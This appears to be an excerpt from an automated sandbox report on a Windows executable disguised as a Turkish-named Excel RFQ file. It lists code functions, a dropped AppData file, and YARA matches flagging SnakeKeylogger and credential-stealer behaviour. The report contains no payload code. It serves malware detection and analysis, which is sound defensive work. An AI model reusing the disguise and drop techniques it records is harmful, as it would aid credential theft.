Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_03051344	1_2_03051344
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_03056C30	1_2_03056C30
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_03051338	1_2_03051338
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_03050227	1_2_03050227
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_03050228	1_2_03050228
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_030521D1	1_2_030521D1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_03056C20	1_2_03056C20
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_07857B30	1_2_07857B30
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_07857B23	1_2_07857B23
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5D278	10_2_02E5D278
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E55362	10_2_02E55362
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5C146	10_2_02E5C146
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5C738	10_2_02E5C738
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5C468	10_2_02E5C468
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5CA08	10_2_02E5CA08
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E569A0	10_2_02E569A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5E988	10_2_02E5E988
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E56FC8	10_2_02E56FC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5CFAA	10_2_02E5CFAA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5CCD8	10_2_02E5CCD8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E59DE0	10_2_02E59DE0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5F631	10_2_02E5F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E53AA1	10_2_02E53AA1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5FA8F	10_2_02E5FA8F
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E539ED	10_2_02E539ED
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E529EC	10_2_02E529EC
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E5E97A	10_2_02E5E97A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E53E09	10_2_02E53E09
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C31E80	10_2_06C31E80
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C317A0	10_2_06C317A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C30B30	10_2_06C30B30
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C39C70	10_2_06C39C70
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C35028	10_2_06C35028
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C39548	10_2_06C39548
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C32968	10_2_06C32968
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3EAFF	10_2_06C3EAFF
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3E6AE	10_2_06C3E6AE
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3E6B0	10_2_06C3E6B0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3E253	10_2_06C3E253
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3E258	10_2_06C3E258
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C31E70	10_2_06C31E70
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3DE00	10_2_06C3DE00
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3178F	10_2_06C3178F
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C38B90	10_2_06C38B90
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C38BA0	10_2_06C38BA0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3F3B8	10_2_06C3F3B8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3EF59	10_2_06C3EF59
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3EF60	10_2_06C3EF60
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3EB08	10_2_06C3EB08
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C30B20	10_2_06C30B20
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3D0F8	10_2_06C3D0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3CCA0	10_2_06C3CCA0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C30040	10_2_06C30040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C39C4F	10_2_06C39C4F
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3FC68	10_2_06C3FC68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C39C6D	10_2_06C39C6D
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3F80B	10_2_06C3F80B
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3F810	10_2_06C3F810
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C35018	10_2_06C35018
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C30023	10_2_06C30023
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3DDFE	10_2_06C3DDFE
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3D9A6	10_2_06C3D9A6
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3D9A8	10_2_06C3D9A8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3D547	10_2_06C3D547
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3D550	10_2_06C3D550
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3953D	10_2_06C3953D
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 11_2_02D7E1F4	11_2_02D7E1F4
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EC468	15_2_057EC468
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EC738	15_2_057EC738
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EC147	15_2_057EC147
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057E7118	15_2_057E7118
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EA088	15_2_057EA088
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057E5362	15_2_057E5362
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057ED278	15_2_057ED278
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057ECCD8	15_2_057ECCD8
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057ECFAB	15_2_057ECFAB
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057E69A0	15_2_057E69A0
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EE988	15_2_057EE988
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057ECA08	15_2_057ECA08
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EF631	15_2_057EF631
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057E3E09	15_2_057E3E09
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EE97B	15_2_057EE97B
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057E29EC	15_2_057E29EC
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057E3B83	15_2_057E3B83
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057E3AA1	15_2_057E3AA1
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 15_2_057EFA93	15_2_057EFA93

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562152532.00000000030E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1566114375.0000000007C40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000000.1504787214.0000000000BA2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamencb.exeD vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1560635778.000000000121E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2759552751.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Binary or memory string: OriginalFilenamencb.exeD vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: qovDEn.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
